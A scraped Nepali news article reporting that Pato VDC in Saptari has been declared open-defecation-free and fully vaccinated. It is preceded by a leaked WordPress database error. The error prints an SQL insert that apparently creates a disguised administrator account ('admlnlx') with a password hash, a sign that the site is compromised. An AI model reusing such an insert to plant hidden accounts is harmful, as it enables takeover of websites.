WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BQPBiGu51FZEJJCtfmANvSuun/tBl70', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-22 03:20:04', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
पातो खुला दिसामुक्त एवम् पूर्ण खोप घोषित – Gaule Khabar

पातो खुला दिसामुक्त एवम् पूर्ण खोप घोषित

पातो खुला दिसामुक्त एवम् पूर्ण खोप घोषित

सप्तरी,मंसिर २८ –

खुला दिसामुक्त अभियान अन्तर्गत पातो गाविसलाई ३२ आँै खुला दिसामुक्त तथा पूर्ण खोप गाविसका रुपमा आज घोषणा गरिएको छ ।

स्थानीय सबल नेपालको सहजीकरण तथा जिएसएफ एवम् ‘युएन ह्याविटाट’को आर्थिक सहयोग तथा प्राविधिक सहयोगमा सो घोषणा गरिएको हो । गाविस सचिव विनोद ठाकुरको अध्यक्षतामा भएको कार्यक्रममा सांसद ताराकान्त चौधरीको पनि उपस्थिति थियो ।

सन् २०१६ भित्रै जिल्लालाई खुला दिसामुक्त घोषणा गर्ने लक्ष्य रहे पनि पछिल्लो चरणमा भएको लामो मधेस आन्दोलनका कारण यो अभियान प्रभावित भएकोले गर्दा लक्ष्य पूरा हुन नसकेको बताइएको छ ।
त्यहाँ ७१ प्रतिशत जनताको पहुँचमा सरसफाइ भएको डिवासिसीको तथ्याङ्कले देखाएको छ । नेपाल सरकारको सन् २०१७ भित्रै नेपाललाई नै खुला दिसामुक्त घोषणा गर्ने लक्ष्य छ । – रासस

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका